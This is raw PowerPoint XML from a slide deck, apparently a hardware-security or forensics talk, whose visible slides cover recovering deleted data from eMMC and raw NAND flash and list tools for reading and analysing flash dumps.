            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E950FD-B3E1-4763-8BA4-72F7AE5620B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9718739" y="3683695"/>
            <a:ext cx="431773" cy="1142484"/>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Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AD2CD6-ED99-40F2-BDCF-CB33B6B5C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8170" y="3415576"/>
            <a:ext cx="978567" cy="943708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F5C110-B83E-446C-957B-62ACBB5D61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6451145" y="889027"/>
            <a:ext cx="1109175" cy="2189111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C75B138-5D1D-D04E-9C5E-0A70D60EC349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2264698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8B6E5-A6F1-4AD5-B4C8-0B148AB7E3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498763" y="297356"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access to deleted data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC80B4FB-86AF-4BAE-90C0-BA2775D66812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1814945"/>
            <a:ext cx="10972800" cy="4335982"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMMC controller does not allow raw access as for raw NAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMMC/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> use raw NAND internally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypassing of the eMMC controller and direct attachment to NAND possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge: the data format of the eMMC controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recommended talk: “eMMC CHIPS. DATA RECOVERY BEYOND CONTROLLER” by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rusolut</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Even if eMMC is deleted, data is still present on internal NAND flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reference: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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https://rusolut.com/wp-content/uploads/2018/10/eMMCvsNAND.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="2000">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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2E10F905-B702-AF4A-AC86-491EF337710F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="934903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F893B7-810C-4A19-B99D-93C4946AEE1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="93845"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tools for raw NAND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD959C9-869F-4D2F-B2E4-864FC75AEAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225572" y="1448972"/>
            <a:ext cx="8383856" cy="5000749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tools for SPI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Any device which supports bit-banging on GPIOs works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raspberry Pi, Arduino, Bus pirate, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>My favorite: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> USB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raw NAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requires some sort of NAND controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See also: “Reverse Engineering Flash Memory for Fun and Benefit”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tools include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> USB with adapters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supports all kind of raw flash chips</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>However: does not interpret proprietary ECC/OOB data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Grafik 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E69B6C5-8B08-481F-A21A-D235AA348C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8609428" y="1417638"/>
            <a:ext cx="3560245" cy="3792879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E9755E-ADD0-447C-B3DA-55FAC7A5497A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11164224" y="2619784"/>
            <a:ext cx="802204" cy="49927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6" name="Rechteck 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBBE7868-ACA0-46BD-9485-BD5E58E654BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11160952" y="4126730"/>
            <a:ext cx="802204" cy="49927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7" name="Rechteck 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81268102-50FD-4E47-B4CD-F241E8136BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8543275" y="2875966"/>
            <a:ext cx="802204" cy="37211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8" name="Rechteck 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C92F010-5713-49C5-9045-40B5AA121518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8700378" y="3979663"/>
            <a:ext cx="802204" cy="49927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A6B71425-AA9A-734D-AC1C-8AE587FE3F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13968654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16AC05-725D-4731-8B74-56229CE18198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477138" y="141744"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analyzing NAND dumps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F01CF9D-F837-4331-AA17-C0F5B8C06AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344774" y="1600201"/>
            <a:ext cx="11237626" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Binwalk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hex editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raw NAND dumps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dumpflash by Jeong Wook (Matt) Oh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/ohjeongwook/DumpFlash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nand-dump-tool by Jean-Michel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Picod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://bitbucket.org/jmichel/tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Problem: exotic OOB sizes and ECC data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
